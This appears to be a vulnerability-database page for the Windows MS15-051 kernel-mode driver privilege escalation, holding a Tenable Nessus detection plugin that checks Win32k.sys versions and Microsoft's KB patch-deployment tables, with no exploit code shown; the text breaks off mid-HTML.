Microsoft Windows - Local Privilege Escalation MS15-051
2015-05-18T00:00:00
ID EDB-ID:37049 Type exploitdb Reporter hfiref0x Modified 2015-05-18T00:00:00
Description
Microsoft Windows - Local Privilege Escalation (MS15-051). CVE-2015-1676,CVE-2015-1677,CVE-2015-1678,CVE-2015-1679,CVE-2015-1680,CVE-2015-1701. Local exploit...
{"nessus": [{"lastseen": "2021-01-01T05:43:43", "description": "The version of Windows running on the remote host is affected by\nmultiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist\n due to the Win32k.sys kernel-mode driver improperly\n handling objects in memory. A local attacker can exploit\n this to reveal private address information during a\n function call, resulting in the disclosure of kernel\n memory contents. (CVE-2015-1676, CVE-2015-1677,\n CVE-2015-1678, CVE-2015-1679, CVE-2015-1680)\n\n - A privilege escalation vulnerability exists due to the\n Win32k.sys kernel-mode driver improperly handling\n objects in memory. A local attacker can exploit this\n flaw, via a specially crafted application, to execute\n arbitrary code in kernel mode. This vulnerability is\n reportedly being exploited in the wild. (CVE-2015-1701)", "edition": 26, "published": "2015-05-12T00:00:00", "title": "MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1679", "CVE-2015-1678", "CVE-2015-1701", "CVE-2015-1680"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS15-051.NASL", "href": "https://www.tenable.com/plugins/nessus/83370", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83370);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2015-1676\",\n \"CVE-2015-1677\",\n \"CVE-2015-1678\",\n \"CVE-2015-1679\",\n \"CVE-2015-1680\",\n \"CVE-2015-1701\"\n );\n script_bugtraq_id(\n 74245,\n 74483,\n 74494,\n 74495,\n 74496,\n 74497\n );\n script_xref(name:\"MSFT\", value:\"MS15-051\");\n script_xref(name:\"MSKB\", value:\"3045171\");\n script_xref(name:\"MSKB\", value:\"3057191\");\n script_xref(name:\"MSKB\", value:\"3065979\");\n script_xref(name:\"IAVA\", value:\"2015-A-0108\");\n\n script_name(english:\"MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191)\");\n script_summary(english:\"Checks the file version of Win32k.sys.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Windows running on the remote host is affected by\nmultiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist\n due to the Win32k.sys kernel-mode driver improperly\n handling objects in memory. A local attacker can exploit\n this to reveal private address information during a\n function call, resulting in the disclosure of kernel\n memory contents. (CVE-2015-1676, CVE-2015-1677,\n CVE-2015-1678, CVE-2015-1679, CVE-2015-1680)\n\n - A privilege escalation vulnerability exists due to the\n Win32k.sys kernel-mode driver improperly handling\n objects in memory. A local attacker can exploit this\n flaw, via a specially crafted application, to execute\n arbitrary code in kernel mode. This vulnerability is\n reportedly being exploited in the wild. (CVE-2015-1701)\");\n # https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37b0306c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-051\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2003, Vista, 2008,\n7, 2008 R2, 8, 2012, 8.1, and 2012 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows ClientCopyImage Win32k Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS15-051';\nkb = '3045171';\n\nkbs = make_list('3057191', kb, '3065979');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n# Some of the 2k3 checks could flag XP 64, which is unsupported\nif (\"Windows XP\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"Win32k.sys\", version:\"6.3.9600.17796\", min_version:\"6.3.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 8 / Windows Server 2012\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"Win32k.sys\", version:\"6.2.9200.21457\", min_version:\"6.2.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"Win32k.sys\", version:\"6.2.9200.17343\", min_version:\"6.2.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.23038\", min_version:\"6.1.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.18834\", min_version:\"6.1.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.23680\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.19372\", min_version:\"6.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows Server 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Win32k.sys\", version:\"5.2.3790.5615\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:47:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1679", "CVE-2015-1678", "CVE-2015-1701", "CVE-2015-1680"], "description": "<html><body><p>Resolves vulnerabilities in Windows that could allow remote code execution if a user opens a specially crafted document or could allow elevation of privilege if an attacker logs on locally and runs arbitrary code in kernel mode.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Windows, the Microsoft .NET Framework, Microsoft Office, Microsoft Lync, and Microsoft Silverlight. The more severe of these vulnerabilities could allow for one of the following scenarios:<br/><ul class=\"sbody-free_list\"><li>Remote code execution if a user opens a specially crafted document or goes to an untrusted webpage that contains embedded TrueType fonts </li><li>Elevation of privilege if an attacker logs on locally and runs arbitrary code in kernel mode. An attacker could then take the following actions:<br/><ul class=\"sbody-free_list\"><li>Install programs</li><li>View, change, or delete data</li><li>Create new accounts that have full user rights</li></ul></li></ul>An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability cannot be exploited remotely or by anonymous users.<br/></div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS15-051. To learn more about this security bulletin:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-1\" target=\"_self\">https://www.microsoft.com/security/pc-security/updates.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"https://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">https://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"https://technet.microsoft.com/library/security/ms15-051\" id=\"kb-link-3\" target=\"_self\">https://technet.microsoft.com/library/security/MS15-051</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals:<br/><a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your Windows-based computer from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3>The following article contains additional information about this security update as it relates to individual product versions. The article may contain\u00a0 information about known issues. <ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/3045171\" id=\"kb-link-8\">3045171 </a> MS15-044 and MS15-051: Description of the security updates for Windows font drivers Known issues in security update 3045171:<br/><ul class=\"sbody-free_list\"><li>After you install this security update (3045171), you experience crashes when you use Windows GDI+ to create text outline-based path objects on a computer that's running Windows 7 or an earlier version of Windows.<br/><br/>To resolve this problem, install update 3065979. For more information, click the following article number to go to the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3065979\" id=\"kb-link-9\">3065979 </a> \"GsDraw error (1): GenericError\" error occurs and application crashes when you create text outline in Windows</div></li><li>After you install this security update (3045171) on a computer that's running Windows Vista or Windows Server 2008, you may receive an error message that resembles the following for the\u00a0<span class=\"sbody-userinput\">FontCache</span> service in the <span class=\"sbody-userinput\">Services</span> Microsoft Management Console (MMC):<br/><br/><br/><br/><div class=\"sbody-error\">Failed to Read Description. Error Code: 15100<br/></div><br/><br/>When you open <span class=\"sbody-userinput\">FontCache</span> service in the <span class=\"sbody-userinput\">Services</span> MMC, you may receive an error message that resembles the following:<br/><br/><br/><div class=\"sbody-error\">Configuration Manager: A general error occurred<br/><br/>The resource loader failed to find MUI file<br/></div><br/><br/>To resolve this problem, install update 971512. For more information, click the following article number to go to the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/971512\" id=\"kb-link-10\">971512 </a> Description of the Windows Graphics, Imaging, and XPS Library </div></li></ul></li></ul><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\">Windows Server 2003 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3045171-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3045171-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3045171-ia64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-11\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">KB3045171.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart requirement</td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">Use the <span class=\"text-base\">Add or Remove </span><span class=\"text-base\">Programs</span> item in <span class=\"text-base\">Control Panel</span>, or use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB3045171$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File information</td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry key verification</td><td class=\"sbody-td\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP3\\KB3045171\\Filelist</td></tr></table></div><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3045171-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-13\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3045171-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3045171-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-15\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3045171-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3045171-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-17\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the /Uninstall setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3045171-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-19\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 8 and Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3045171-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3045171-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3045171-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3045171-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows RT and Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">These updates are available through <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-25\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr></table></div></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File information</h2><div class=\"kb-summary-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold 